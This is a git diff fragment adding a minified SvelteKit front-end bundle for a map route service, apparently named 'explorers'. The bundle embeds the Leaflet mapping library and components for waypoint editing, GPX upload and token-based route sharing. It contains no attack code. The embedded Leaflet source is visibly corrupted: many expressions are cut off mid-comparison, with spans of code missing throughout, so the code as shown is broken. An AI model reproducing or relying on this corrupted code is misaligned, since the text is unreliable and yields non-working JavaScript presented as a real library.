touchcancel",this._onTouchEnd,this),this._map.options.zoomAnimation?this._map._animateZoom(this._center,this._map._limitZoom(this._zoom),!0,this._map.options.zoomSnap):this._map._resetView(this._center,this._map._limitZoom(this._zoom))}});H.addInitHook("addHandler","touchZoom",Dn),H.BoxZoom=On,H.DoubleClickZoom=Zn,H.Drag=In,H.Keyboard=An,H.ScrollWheelZoom=Bn,H.TapHold=Nn,H.TouchZoom=Dn,h.Bounds=Q,h.Browser=T,h.CRS=Zt,h.Canvas=Sn,h.Circle=yi,h.CircleMarker=Ie,h.Class=lt,h.Control=Mt,h.DivIcon=Tn,h.DivOverlay=zt,h.DomEvent=bo,h.DomUtil=xo,h.Draggable=Ut,h.Evented=Ht,h.FeatureGroup=It,h.GeoJSON=Bt,h.GridLayer=ve,h.Handler=Et,h.Icon=ee,h.ImageOverlay=Re,h.LatLng=j,h.LatLngBounds=vt,h.Layer=Ct,h.LayerGroup=te,h.LineUtil=No,h.Map=H,h.Marker=Ze,h.Mixin=zo,h.Path=Vt,h.Point=E,h.PolyUtil=Oo,h.Polygon=ie,h.Polyline=At,h.Popup=Fe,h.PosAnimation=an,h.Projection=Do,h.Rectangle=zn,h.Renderer=Nt,h.SVG=ye,h.SVGOverlay=bn,h.TileLayer=oe,h.Tooltip=He,h.Transformation=Ge,h.Util=Le,h.VideoOverlay=Ln,h.bind=_,h.bounds=pt,h.canvas=kn,h.circle=qo,h.circleMarker=Go,h.control=_e,h.divIcon=es,h.extend=l,h.featureGroup=Wo,h.geoJSON=xn,h.geoJson=Yo,h.gridLayer=is,h.icon=Uo,h.imageOverlay=Jo,h.latLng=F,h.latLngBounds=it,h.layerGroup=Ho,h.map=To,h.marker=Vo,h.point=Z,h.polygon=Ko,h.polyline=jo,h.popup=$o,h.rectangle=ss,h.setOptions=k,h.stamp=g,h.svg=En,h.svgOverlay=Qo,h.tileLayer=Mn,h.tooltip=ts,h.transformation=re,h.version=d,h.videoOverlay=Xo;var as=window.L;h.noConflict=function(){return window.L=as,this},window.L=h})})(Ti,Ti.exports);var Cs=Ti.exports;const Jt=Ms(Cs);function Ss(m){let f,h,d,l,w,_,P,g,W,S;return{c(){f=D("div"),h=D("p"),d=D("b"),l=Dt(m[0]),w=yt(),_=D("p"),P=Dt(m[1]),g=yt(),W=D("p"),S=Dt(m[2]),this.h()},l(v){f=R(v,"DIV",{style:!0});var b=Y(f);h=R(b,"P",{});var p=Y(h);d=R(p,"B",{});var x=Y(d);l=Rt(x,m[0]),x.forEach(O),p.forEach(O),w=wt(b),_=R(b,"P",{});var k=Y(_);P=Rt(k,m[1]),k.forEach(O),g=wt(b),W=R(b,"P",{});var ft=Y(W);S=Rt(ft,m[2]),ft.forEach(O),b.forEach(O),this.h()},h(){ct(f,"width","100%"),ct(f,"text-align","center")},m(v,b){st(v,f,b),B(f,h),B(h,d),B(d,l),B(f,w),B(f,_),B(_,P),B(f,g),B(f,W),B(W,S)},p(v,b){b&1&&xe(l,v[0]),b&2&&xe(P,v[1]),b&4&&xe(S,v[2])},d(v){v&&O(f)}}}function ks(m){let f,h="Delete",d,l,w,_,P,g,W,S,v,b;return{c(){f=D("button"),f.textContent=h,d=yt(),l=D("div"),w=Dt(`Title: + `),_=D("input"),P=Dt(` + Description: + `),g=D("input"),W=Dt(` + Comment: + `),S=D("input"),this.h()},l(p){f=R(p,"BUTTON",{class:!0,"data-svelte-h":!0}),we(f)!=="svelte-1m4hfbw"&&(f.textContent=h),d=wt(p),l=R(p,"DIV",{style:!0});var x=Y(l);w=Rt(x,`Title: + `),_=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),P=Rt(x,` + Description: + `),g=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),W=Rt(x,` + Comment: + `),S=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),x.forEach(O),this.h()},h(){z(f,"class","button is-small is-danger"),z(_,"class","input is-static"),z(_,"type","text"),z(_,"name","title"),ct(_,"width","100%"),ct(_,"text-align","center"),ct(_,"font-weight","600"),z(g,"class","input is-static"),z(g,"type","text"),z(g,"name","desc"),ct(g,"width","100%"),ct(g,"text-align","center"),ct(g,"font-weight","600"),z(S,"class","input is-static"),z(S,"type","text"),z(S,"name","desc"),ct(S,"width","100%"),ct(S,"text-align","center"),ct(S,"font-weight","600"),ct(l,"width","100%"),ct(l,"text-align","center"),ct(l,"font-weight","400")},m(p,x){st(p,f,x),st(p,d,x),st(p,l,x),B(l,w),B(l,_),Ot(_,m[0]),B(l,P),B(l,g),Ot(g,m[1]),B(l,W),B(l,S),Ot(S,m[2]),v||(b=[bt(f,"click",m[5]),bt(_,"change",m[4]),bt(_,"input",m[6]),bt(g,"change",m[4]),bt(g,"input",m[7]),bt(S,"change",m[4]),bt(S,"input",m[8])],v=!0)},p(p,x){x&1&&_.value!==p[0]&&Ot(_,p[0]),x&2&&g.value!==p[1]&&Ot(g,p[1]),x&4&&S.value!==p[2]&&Ot(S,p[2])},d(p){p&&(O(f),O(d),O(l)),v=!1,Ci(b)}}}function Es(m){let f;function h(w,_){return w[3]?ks:Ss}let d=h(m),l=d(m);return{c(){f=D("div"),l.c()},l(w){f=R(w,"DIV",{});var _=Y(f);l.l(_),_.forEach(O)},m(w,_){st(w,f,_),l.m(f,null)},p(w,[_]){d===(d=h(w))&&l?l.p(w,_):(l.d(1),l=d(w),l&&(l.c(),l.m(f,null)))},i:Pe,o:Pe,d(w){w&&O(f),l.d()}}}function zs(m,f,h){const d=ps();let{title:l}=f,{desc:w}=f,{comment:_}=f,{editable:P}=f;function g(){d("change",{title:l,desc:w,comment:_})}function W(){d("delete",{title:l})}function S(){l=this.value,h(0,l)}function v(){w=this.value,h(1,w)}function b(){_=this.value,h(2,_)}return m.$$set=p=>{"title"in p&&h(0,l=p.title),"desc"in p&&h(1,w=p.desc),"comment"in p&&h(2,_=p.comment),"editable"in p&&h(3,P=p.editable)},[l,w,_,P,g,W,S,v,b]}class Os extends Si{constructor(f){super(),ki(this,f,zs,Es,Mi,{title:0,desc:1,comment:2,editable:3})}}function Zs(m){let f,h,d,l,w;return{c(){f=D("link"),h=yt(),d=D("div"),this.h()},l(_){f=R(_,"LINK",{rel:!0,href:!0,integrity:!0,crossorigin:!0}),h=wt(_),d=R(_,"DIV",{class:!0,style:!0}),Y(d).forEach(O),this.h()},h(){z(f,"rel","stylesheet"),z(f,"href","https://unpkg.com/leaflet@1.6.0/dist/leaflet.css"),z(f,"integrity","sha512-xwE/Az9zrjBIphAcBb3F6JVqxf46+CDLwfLMHloNu6KEQCAWi6HcDUbeOfBIptF7tcCzusKFjFw2yuvEpDL9wQ=="),z(f,"crossorigin",""),z(d,"class","map"),ct(d,"height","400px"),ct(d,"width","100%")},m(_,P){st(_,f,P),st(_,h,P),st(_,d,P),l||(w=vs(m[0].call(null,d)),l=!0)},p:Pe,i:Pe,o:Pe,d(_){_&&(O(f),O(h),O(d)),l=!1,w()}}}function Is(m){if(m.track_points.length>0){let f=m.track_points[0];return[parseFloat(f.lat)||0,parseFloat(f.lon)||0]}return[55.8283,37.5795]}function As(m,f,h){let{route:d}=f,{editable:l}=f,w;function _(v,b,p){let x;v.bindPopup(()=>{let k=Jt.DomUtil.create("div");return x=b(k),k}),v.on("dragend",k=>{p(k.target.getLatLng())}),v.on("popupclose",()=>{if(x){let k=x;x=null,setTimeout(()=>{k.$destroy()},500)}})}function P(){let v=[];for(let b of d.track_points)v.push([parseFloat(b.lat)||0,parseFloat(b.lon)||0]);return Jt.polyline(v,{color:"#E4E",opacity:.5})}function g(v){let b=Is(d),p=Jt.map(v,{preferCanvas:!0}).setView(b,10);return p.attributionControl.setPrefix(""),Jt.tileLayer("https://{s}.basemaps.cartocdn.com/rastertiles/voyager/{z}/{x}/{y}{r}.png",{attribution:`©OpenStreetMap, + ©CARTO`,subdomains:"abcd",maxZoom:14}).addTo(p),p}function W(){w.eachLayer(function(p){p instanceof Jt.LayerGroup&&w.removeLayer(p)});let v=Jt.layerGroup(),b=P();for(let[p,x]of d.waypoints.entries()){let k=[parseFloat(x.lat)||0,parseFloat(x.lon)||0],ft=Jt.marker(k,{draggable:l});_(ft,V=>{let rt=new Os({target:V,props:{title:x.name,desc:x.desc,comment:x.comment,editable:l}});return rt.$on("change",q=>{const M=q.detail;h(1,d.waypoints[p].name=M.title,d),h(1,d.waypoints[p].desc=M.desc,d),h(1,d.waypoints[p].comment=M.comment,d)}),rt.$on("delete",q=>{d.waypoints.splice(p,1),W()}),rt},V=>{h(1,d.waypoints[p].lat=V.lat.toString(),d),h(1,d.waypoints[p].lon=V.lng.toString(),d)}),v.addLayer(ft)}v.addTo(w),b.addTo(w)}function S(v){w=g(v),W()}return m.$$set=v=>{"route"in v&&h(1,d=v.route),"editable"in v&&h(2,l=v.editable)},[S,d,l]}class Bs extends Si{constructor(f){super(),ki(this,f,As,Zs,Mi,{route:1,editable:2})}}function Un(m){let f,h;return{c(){f=D("div"),h=Dt(m[1]),this.h()},l(d){f=R(d,"DIV",{class:!0});var l=Y(f);h=Rt(l,m[1]),l.forEach(O),this.h()},h(){z(f,"class","notification is-danger")},m(d,l){st(d,f,l),B(f,h)},p(d,l){l&2&&xe(h,d[1])},d(d){d&&O(f)}}}function Ns(m){let f,h,d,l,w;return{c(){f=D("div"),h=D("div"),d=D("a"),l=Dt("Share"),this.h()},l(_){f=R(_,"DIV",{});var P=Y(f);h=R(P,"DIV",{class:!0});var g=Y(h);d=R(g,"A",{href:!0});var W=Y(d);l=Rt(W,"Share"),W.forEach(O),g.forEach(O),P.forEach(O),this.h()},h(){z(d,"href",w="/route/"+m[0].id+"?token="+m[0].share_token),z(h,"class","container")},m(_,P){st(_,f,P),B(f,h),B(h,d),B(d,l)},p(_,P){P&1&&w!==(w="/route/"+_[0].id+"?token="+_[0].share_token)&&z(d,"href",w)},d(_){_&&O(f)}}}function Ds(m){let f,h,d,l,w,_,P,g='Upload a GPX file',W,S,v,b,p,x,k="Upload",ft,V,rt="",q,M,G,mt="Save",Tt,Ft,J=m[2]&&m[2].length>0&&Vn(m);return{c(){f=D("div"),h=D("div"),d=D("div"),l=D("label"),w=D("input"),_=yt(),P=D("span"),P.innerHTML=g,W=yt(),S=D("span"),J&&J.c(),v=yt(),b=D("div"),p=D("div"),x=D("button"),x.textContent=k,ft=yt(),V=D("div"),V.innerHTML=rt,q=yt(),M=D("div"),G=D("button"),G.textContent=mt,this.h()},l(ht){f=R(ht,"DIV",{class:!0});var X=Y(f);h=R(X,"DIV",{class:!0});var dt=Y(h);d=R(dt,"DIV",{class:!0});var Le=Y(d);l=R(Le,"LABEL",{class:!0});var lt=Y(l);w=R(lt,"INPUT",{class:!0,type:!0,name:!0,id:!0}),_=wt(lt),P=R(lt,"SPAN",{class:!0,"data-svelte-h":!0}),we(P)!=="svelte-1yfha46"&&(P.innerHTML=g),W=wt(lt),S=R(lt,"SPAN",{class:!0});var be=Y(S);J&&J.l(be),be.forEach(O),lt.forEach(O),Le.forEach(O),dt.forEach(O),X.forEach(O),v=wt(ht),b=R(ht,"DIV",{class:!0});var et=Y(b);p=R(et,"DIV",{class:!0});var Ht=Y(p);x=R(Ht,"BUTTON",{class:!0,"data-svelte-h":!0}),we(x)!=="svelte-1big487"&&(x.textContent=k),Ht.forEach(O),ft=wt(et),V=R(et,"DIV",{class:!0,"data-svelte-h":!0}),we(V)!=="svelte-1gc3yf9"&&(V.innerHTML=rt),q=wt(et),M=R(et,"DIV",{class:!0});var E=Y(M);G=R(E,"BUTTON",{class:!0,"data-svelte-h":!0}),we(G)!=="svelte-155muy4"&&(G.textContent=mt),E.forEach(O),et.forEach(O),this.h()},h(){z(w,"class","file-input"),z(w,"type","file"),z(w,"name","file"),z(w,"id","file"),z(P,"class","file-cta"),z(S,"class","file-name"),z(l,"class","file-label"),z(d,"class","file"),z(h,"class","column is-half is-offset-one-quarter"),z(f,"class","columns is-centered"),z(x,"class","button is-info"),z(p,"class","column is-one-third has-text-centered"),z(V,"class","column is-one-third has-text-centered"),z(G,"class","button is-primary"),z(M,"class","column is-one-third has-text-centered"),z(b,"class","columns is-centered")},m(ht,X){st(ht,f,X),B(f,h),B(h,d),B(d,l),B(l,w),B(l,_),B(l,P),B(l,W),B(l,S),J&&J.m(S,null),st(ht,v,X),st(ht,b,X),B(b,p),B(p,x),B(b,ft),B(b,V),B(b,q),B(b,M),B(M,G),Tt||(Ft=[bt(w,"change",m[9]),bt(x,"click",m[4]),bt(G,"click",m[5])],Tt=!0)},p(ht,X){ht[2]&&ht[2].length>0?J?J.p(ht,X):(J=Vn(ht),J.c(),J.m(S,null)):J&&(J.d(1),J=null)},d(ht){ht&&(O(f),O(v),O(b)),J&&J.d(),Tt=!1,Ci(Ft)}}}function Vn(m){let f=m[2][0].name+"",h;return{c(){h=Dt(f)},l(d){h=Rt(d,f)},m(d,l){st(d,h,l)},p(d,l){l&4&&f!==(f=d[2][0].name+"")&&xe(h,f)},d(d){d&&O(h)}}}function Rs(m){let f,h,d,l,w,_,P,g,W,S,v,b,p,x,k,ft,V=m[1]&&Un(m),rt=m[3]&&Ns(m);v=new Bs({props:{route:m[0],editable:m[3]}});let q=m[3]&&Ds(m);return{c(){V&&V.c(),f=yt(),h=D("section"),d=D("div"),l=D("input"),w=yt(),_=D("div"),P=D("input"),g=yt(),rt&&rt.c(),W=yt(),S=D("section"),gs(v.$$.fragment),b=yt(),p=D("section"),q&&q.c(),this.h()},l(M){V&&V.l(M),f=wt(M),h=R(M,"SECTION",{class:!0});var G=Y(h);d=R(G,"DIV",{class:!0});var mt=Y(d);l=R(mt,"INPUT",{class:!0,type:!0,placeholder:!0}),w=wt(mt),_=R(mt,"DIV",{class:!0});var Tt=Y(_);P=R(Tt,"INPUT",{class:!0,type:!0,placeholder:!0}),g=wt(Tt),rt&&rt.l(Tt),Tt.forEach(O),mt.forEach(O),G.forEach(O),W=wt(M),S=R(M,"SECTION",{});var Ft=Y(S);ys(v.$$.fragment,Ft),Ft.forEach(O),b=wt(M),p=R(M,"SECTION",{class:!0});var J=Y(p);q&&q.l(J),J.forEach(O),this.h()},h(){z(l,"class","input title is-static"),z(l,"type","text"),z(l,"placeholder","Title"),l.readOnly=!m[3],z(P,"class","input is-static"),z(P,"type","text"),z(P,"placeholder","Description"),P.readOnly=!m[3],z(_,"class","subtitle"),z(d,"class","hero-body"),z(h,"class","hero"),z(p,"class","section")},m(M,G){V&&V.m(M,G),st(M,f,G),st(M,h,G),B(h,d),B(d,l),Ot(l,m[0].title),B(d,w),B(d,_),B(_,P),Ot(P,m[0].description),B(_,g),rt&&rt.m(_,null),st(M,W,G),st(M,S,G),ws(v,S,null),st(M,b,G),st(M,p,G),q&&q.m(p,null),x=!0,k||(ft=[bt(l,"input",m[7]),bt(P,"input",m[8])],k=!0)},p(M,[G]){M[1]?V?V.p(M,G):(V=Un(M),V.c(),V.m(f.parentNode,f)):V&&(V.d(1),V=null),G&1&&l.value!==M[0].title&&Ot(l,M[0].title),G&1&&P.value!==M[0].description&&Ot(P,M[0].description),M[3]&&rt.p(M,G);const mt={};G&1&&(mt.route=M[0]),v.$set(mt),M[3]&&q.p(M,G)},i(M){x||(Ps(v.$$.fragment,M),x=!0)},o(M){xs(v.$$.fragment,M),x=!1},d(M){M&&(O(f),O(h),O(W),O(S),O(b),O(p)),V&&V.d(M),rt&&rt.d(),Ls(v),q&&q.d(),k=!1,Ci(ft)}}}function Fs(m,f,h){let{data:d}=f,l=d.route,w=d.error,_=l.user_id===d.user.id,P;async function g(){if(!P||P.length===0)return;let p=new FormData;p.append("file",P[0]);const x=await fetch(`${bi}/route/${l.id}/upload`,{method:"POST",body:p,credentials:"include"});if(x.ok){h(0,l=await x.json()),h(2,P=null),await Wn();return}h(1,w=await x.text());try{h(1,w=JSON.parse(w).detail.error)}catch(k){console.log(k)}}async function W(){const p=await fetch(`${bi}/route/${l.id}/update`,{method:"POST",body:JSON.stringify({title:l.title,description:l.description,track_points:l.track_points,waypoints:l.waypoints}),credentials:"include",headers:{"Content-Type":"application/json"}});if(p.ok){h(0,l=await p.json()),h(2,P=null),await Wn();return}h(1,w=await p.text());try{h(1,w=JSON.parse(w).detail.error)}catch(x){console.log(x)}}function S(){l.title=this.value,h(0,l)}function v(){l.description=this.value,h(0,l)}function b(){P=this.files,h(2,P)}return m.$$set=p=>{"data"in p&&h(6,d=p.data)},[l,w,P,_,g,W,d,S,v,b]}class qs extends Si{constructor(f){super(),ki(this,f,Fs,Rs,Mi,{data:6})}}export{qs as component,Gs as universal}; diff --git a/services/explorers/front/build/_app/immutable/nodes/5.bfc246c8.js b/services/explorers/front/build/_app/immutable/nodes/5.bfc246c8.js new file mode 100644 index 0000000..3d69407 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/5.bfc246c8.js @@ -0,0 +1,15 @@ +import{P as bi}from"../chunks/public.aa8ed6af.js";import{s as Mi,f as D,g as R,h as Y,d as O,i as st,z as Pe,N as ps,l as Dt,a as yt,m as Rt,c as wt,k as ct,v as B,n as xe,u as we,j as z,O as Ot,H as bt,I as Ci,P as vs}from"../chunks/scheduler.1f572272.js";import{S as Si,i as ki,b as gs,d as ys,m as ws,a as Ps,t as xs,e as Ls}from"../chunks/index.b942bf85.js";import{i as Wn}from"../chunks/navigation.872e8737.js";async function bs({fetch:m,parent:f,params:h,url:d}){await f();let l=h.slug,w=d.searchParams.get("token"),_=`${bi}/route/${l}`+(w?`?token=${w}`:""),P=await m(_,{credentials:"include"});if(P.ok)return{route:await P.json(),error:null};let g=await P.text();try{g=await P.json().detail.error}catch{}return{route:{},error:g}}const Gs=Object.freeze(Object.defineProperty({__proto__:null,load:bs},Symbol.toStringTag,{value:"Module"}));var Ts=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function Ms(m){return m&&m.__esModule&&Object.prototype.hasOwnProperty.call(m,"default")?m.default:m}var Ti={exports:{}};/* @preserve + * Leaflet 1.9.4, a JS library for interactive maps. https://leafletjs.com + * (c) 2010-2023 Vladimir Agafonkin, (c) 2010-2011 CloudMade + */(function(m,f){(function(h,d){d(f)})(Ts,function(h){var d="1.9.4";function l(t){var e,i,n,o;for(i=1,n=arguments.length;i"u"||!L||!L.Mixin)){t=q(t)?t:[t];for(var e=0;e0?Math.floor(t):Math.ceil(t)};E.prototype={clone:function(){return new E(this.x,this.y)},add:function(t){return this.clone()._add(Z(t))},_add:function(t){return this.x+=t.x,this.y+=t.y,this},subtract:function(t){return this.clone()._subtract(Z(t))},_subtract:function(t){return this.x-=t.x,this.y-=t.y,this},divideBy:function(t){return this.clone()._divideBy(t)},_divideBy:function(t){return this.x/=t,this.y/=t,this},multiplyBy:function(t){return this.clone()._multiplyBy(t)},_multiplyBy:function(t){return this.x*=t,this.y*=t,this},scaleBy:function(t){return new E(this.x*t.x,this.y*t.y)},unscaleBy:function(t){return new E(this.x/t.x,this.y/t.y)},round:function(){return this.clone()._round()},_round:function(){return this.x=Math.round(this.x),this.y=Math.round(this.y),this},floor:function(){return this.clone()._floor()},_floor:function(){return this.x=Math.floor(this.x),this.y=Math.floor(this.y),this},ceil:function(){return this.clone()._ceil()},_ceil:function(){return this.x=Math.ceil(this.x),this.y=Math.ceil(this.y),this},trunc:function(){return this.clone()._trunc()},_trunc:function(){return this.x=Ei(this.x),this.y=Ei(this.y),this},distanceTo:function(t){t=Z(t);var e=t.x-this.x,i=t.y-this.y;return Math.sqrt(e*e+i*i)},equals:function(t){return t=Z(t),t.x===this.x&&t.y===this.y},contains:function(t){return t=Z(t),Math.abs(t.x)<=Math.abs(this.x)&&Math.abs(t.y)<=Math.abs(this.y)},toString:function(){return"Point("+b(this.x)+", "+b(this.y)+")"}};function Z(t,e,i){return t instanceof E?t:q(t)?new E(t[0],t[1]):t==null?t:typeof t=="object"&&"x"in t&&"y"in t?new E(t.x,t.y):new E(t,e,i)}function Q(t,e){if(t)for(var i=e?[t,e]:t,n=0,o=i.length;n=this.min.x&&i.x<=this.max.x&&e.y>=this.min.y&&i.y<=this.max.y},intersects:function(t){t=pt(t);var e=this.min,i=this.max,n=t.min,o=t.max,s=o.x>=e.x&&n.x<=i.x,r=o.y>=e.y&&n.y<=i.y;return s&&r},overlaps:function(t){t=pt(t);var e=this.min,i=this.max,n=t.min,o=t.max,s=o.x>e.x&&n.xe.y&&n.y=e.lat&&o.lat<=i.lat&&n.lng>=e.lng&&o.lng<=i.lng},intersects:function(t){t=it(t);var e=this._southWest,i=this._northEast,n=t.getSouthWest(),o=t.getNorthEast(),s=o.lat>=e.lat&&n.lat<=i.lat,r=o.lng>=e.lng&&n.lng<=i.lng;return s&&r},overlaps:function(t){t=it(t);var e=this._southWest,i=this._northEast,n=t.getSouthWest(),o=t.getNorthEast(),s=o.lat>e.lat&&n.late.lng&&n.lng1,oo=function(){var t=!1;try{var e=Object.defineProperty({},"passive",{get:function(){t=!0}});window.addEventListener("testPassiveEventSupport",v,e),window.removeEventListener("testPassiveEventSupport",v,e)}catch{}return t}(),so=function(){return!!document.createElement("canvas").getContext}(),Xe=!!(document.createElementNS&&Oi("svg").createSVGRect),ro=!!Xe&&function(){var t=document.createElement("div");return t.innerHTML="",(t.firstChild&&t.firstChild.namespaceURI)==="http://www.w3.org/2000/svg"}(),ao=!Xe&&function(){try{var t=document.createElement("div");t.innerHTML='';var e=t.firstChild;return e.style.behavior="url(#default#VML)",e&&typeof e.adj=="object"}catch{return!1}}(),ho=navigator.platform.indexOf("Mac")===0,uo=navigator.platform.indexOf("Linux")===0;function St(t){return navigator.userAgent.toLowerCase().indexOf(t)>=0}var T={ie:Te,ielt9:qn,edge:Ii,webkit:Ke,android:Ai,android23:Bi,androidStock:Kn,opera:Ye,chrome:Ni,gecko:Di,safari:Yn,phantom:Ri,opera12:Fi,win:Jn,ie3d:Hi,webkit3d:Je,gecko3d:Wi,any3d:Xn,mobile:ae,mobileWebkit:Qn,mobileWebkit3d:$n,msPointer:Ui,pointer:Vi,touch:to,touchNative:Gi,mobileOpera:eo,mobileGecko:io,retina:no,passiveEvents:oo,canvas:so,svg:Xe,vml:ao,inlineSvg:ro,mac:ho,linux:uo},qi=T.msPointer?"MSPointerDown":"pointerdown",ji=T.msPointer?"MSPointerMove":"pointermove",Ki=T.msPointer?"MSPointerUp":"pointerup",Yi=T.msPointer?"MSPointerCancel":"pointercancel",Qe={touchstart:qi,touchmove:ji,touchend:Ki,touchcancel:Yi},Ji={touchstart:po,touchmove:Me,touchend:Me,touchcancel:Me},Xt={},Xi=!1;function lo(t,e,i){return e==="touchstart"&&mo(),Ji[e]?(i=Ji[e].bind(this,i),t.addEventListener(Qe[e],i,!1),i):(console.warn("wrong event specified:",e),v)}function co(t,e,i){if(!Qe[e]){console.warn("wrong event specified:",e);return}t.removeEventListener(Qe[e],i,!1)}function fo(t){Xt[t.pointerId]=t}function _o(t){Xt[t.pointerId]&&(Xt[t.pointerId]=t)}function Qi(t){delete Xt[t.pointerId]}function mo(){Xi||(document.addEventListener(qi,fo,!0),document.addEventListener(ji,_o,!0),document.addEventListener(Ki,Qi,!0),document.addEventListener(Yi,Qi,!0),Xi=!0)}function Me(t,e){if(e.pointerType!==(e.MSPOINTER_TYPE_MOUSE||"mouse")){e.touches=[];for(var i in Xt)e.touches.push(Xt[i]);e.changedTouches=[e],t(e)}}function po(t,e){e.MSPOINTER_TYPE_TOUCH&&e.pointerType===e.MSPOINTER_TYPE_TOUCH&&ut(e),Me(t,e)}function vo(t){var e={},i,n;for(n in t)i=t[n],e[n]=i&&i.bind?i.bind(t):i;return t=e,e.type="dblclick",e.detail=2,e.isTrusted=!1,e._simulated=!0,e}var go=200;function yo(t,e){t.addEventListener("dblclick",e);var i=0,n;function o(s){if(s.detail!==1){n=s.detail;return}if(!(s.pointerType==="mouse"||s.sourceCapabilities&&!s.sourceCapabilities.firesTouchEvents)){var r=on(s);if(!(r.some(function(u){return u instanceof HTMLLabelElement&&u.attributes.for})&&!r.some(function(u){return u instanceof HTMLInputElement||u instanceof HTMLSelectElement}))){var a=Date.now();a-i<=go?(n++,n===2&&e(vo(s))):n=1,i=a}}}return t.addEventListener("click",o),{dblclick:e,simDblclick:o}}function wo(t,e){t.removeEventListener("dblclick",e.dblclick),t.removeEventListener("click",e.simDblclick)}var $e=ke(["transform","webkitTransform","OTransform","MozTransform","msTransform"]),he=ke(["webkitTransition","transition","OTransition","MozTransition","msTransition"]),$i=he==="webkitTransition"||he==="OTransition"?he+"End":"transitionend";function tn(t){return typeof t=="string"?document.getElementById(t):t}function ue(t,e){var i=t.style[e]||t.currentStyle&&t.currentStyle[e];if((!i||i==="auto")&&document.defaultView){var n=document.defaultView.getComputedStyle(t,null);i=n?n[e]:null}return i==="auto"?null:i}function U(t,e,i){var n=document.createElement(t);return n.className=e||"",i&&i.appendChild(n),n}function $(t){var e=t.parentNode;e&&e.removeChild(t)}function Ce(t){for(;t.firstChild;)t.removeChild(t.firstChild)}function Qt(t){var e=t.parentNode;e&&e.lastChild!==t&&e.appendChild(t)}function $t(t){var e=t.parentNode;e&&e.firstChild!==t&&e.insertBefore(t,e.firstChild)}function ti(t,e){if(t.classList!==void 0)return t.classList.contains(e);var i=Se(t);return i.length>0&&new RegExp("(^|\\s)"+e+"(\\s|$)").test(i)}function A(t,e){if(t.classList!==void 0)for(var i=x(e),n=0,o=i.length;n0?2*window.devicePixelRatio:1;function rn(t){return T.edge?t.wheelDeltaY/2:t.deltaY&&t.deltaMode===0?-t.deltaY/Lo:t.deltaY&&t.deltaMode===1?-t.deltaY*20:t.deltaY&&t.deltaMode===2?-t.deltaY*60:t.deltaX||t.deltaZ?0:t.wheelDelta?(t.wheelDeltaY||t.wheelDelta)/2:t.detail&&Math.abs(t.detail)<32765?-t.detail*20:t.detail?t.detail/-32765*60:0}function fi(t,e){var i=e.relatedTarget;if(!i)return!0;try{for(;i&&i!==t;)i=i.parentNode}catch{return!1}return i!==t}var bo={__proto__:null,on:I,off:K,stopPropagation:jt,disableScrollPropagation:ci,disableClickPropagation:de,preventDefault:ut,stop:Kt,getPropagationPath:on,getMousePosition:sn,getWheelDelta:rn,isExternalTarget:fi,addListener:I,removeListener:K},an=Ht.extend({run:function(t,e,i,n){this.stop(),this._el=t,this._inProgress=!0,this._duration=i||.25,this._easeOutPower=1/Math.max(n||.5,.2),this._startPos=qt(t),this._offset=e.subtract(this._startPos),this._startTime=+new Date,this.fire("start"),this._animate()},stop:function(){this._inProgress&&(this._step(!0),this._complete())},_animate:function(){this._animId=X(this._animate,this),this._step()},_step:function(t){var e=+new Date-this._startTime,i=this._duration*1e3;ethis.options.maxZoom)?this.setZoom(t):this},panInsideBounds:function(t,e){this._enforcingBounds=!0;var i=this.getCenter(),n=this._limitCenter(i,this._zoom,it(t));return i.equals(n)||this.panTo(n,e),this._enforcingBounds=!1,this},panInside:function(t,e){e=e||{};var i=Z(e.paddingTopLeft||e.padding||[0,0]),n=Z(e.paddingBottomRight||e.padding||[0,0]),o=this.project(this.getCenter()),s=this.project(t),r=this.getPixelBounds(),a=pt([r.min.add(i),r.max.subtract(n)]),u=a.getSize();if(!a.contains(s)){this._enforcingBounds=!0;var c=s.subtract(a.getCenter()),y=a.extend(s).getSize().subtract(u);o.x+=c.x<0?-y.x:y.x,o.y+=c.y<0?-y.y:y.y,this.panTo(this.unproject(o),e),this._enforcingBounds=!1}return this},invalidateSize:function(t){if(!this._loaded)return this;t=l({animate:!1,pan:!0},t===!0?{animate:!0}:t);var e=this.getSize();this._sizeChanged=!0,this._lastCenter=null;var i=this.getSize(),n=e.divideBy(2).round(),o=i.divideBy(2).round(),s=n.subtract(o);return!s.x&&!s.y?this:(t.animate&&t.pan?this.panBy(s):(t.pan&&this._rawPanBy(s),this.fire("move"),t.debounceMoveend?(clearTimeout(this._sizeTimer),this._sizeTimer=setTimeout(_(this.fire,this,"moveend"),200)):this.fire("moveend")),this.fire("resize",{oldSize:e,newSize:i}))},stop:function(){return this.setZoom(this._limitZoom(this._zoom)),this.options.zoomSnap||this.fire("viewreset"),this._stop()},locate:function(t){if(t=this._locateOptions=l({timeout:1e4,watch:!1},t),!("geolocation"in navigator))return this._handleGeolocationError({code:0,message:"Geolocation not supported."}),this;var e=_(this._handleGeolocationResponse,this),i=_(this._handleGeolocationError,this);return t.watch?this._locationWatchId=navigator.geolocation.watchPosition(e,i,t):navigator.geolocation.getCurrentPosition(e,i,t),this},stopLocate:function(){return navigator.geolocation&&navigator.geolocation.clearWatch&&navigator.geolocation.clearWatch(this._locationWatchId),this._locateOptions&&(this._locateOptions.setView=!1),this},_handleGeolocationError:function(t){if(this._container._leaflet_id){var e=t.code,i=t.message||(e===1?"permission denied":e===2?"position unavailable":"timeout");this._locateOptions.setView&&!this._loaded&&this.fitWorld(),this.fire("locationerror",{code:e,message:"Geolocation error: "+i+"."})}},_handleGeolocationResponse:function(t){if(this._container._leaflet_id){var e=t.coords.latitude,i=t.coords.longitude,n=new j(e,i),o=n.toBounds(t.coords.accuracy*2),s=this._locateOptions;if(s.setView){var r=this.getBoundsZoom(o);this.setView(n,s.maxZoom?Math.min(r,s.maxZoom):r)}var a={latlng:n,bounds:o,timestamp:t.timestamp};for(var u in t.coords)typeof t.coords[u]=="number"&&(a[u]=t.coords[u]);this.fire("locationfound",a)}},addHandler:function(t,e){if(!e)return this;var i=this[t]=new e(this);return this._handlers.push(i),this.options[t]&&i.enable(),this},remove:function(){if(this._initEvents(!0),this.options.maxBounds&&this.off("moveend",this._panInsideMaxBounds),this._containerId!==this._container._leaflet_id)throw new Error("Map container is being reused by another instance");try{delete this._container._leaflet_id,delete this._containerId}catch{this._container._leaflet_id=void 0,this._containerId=void 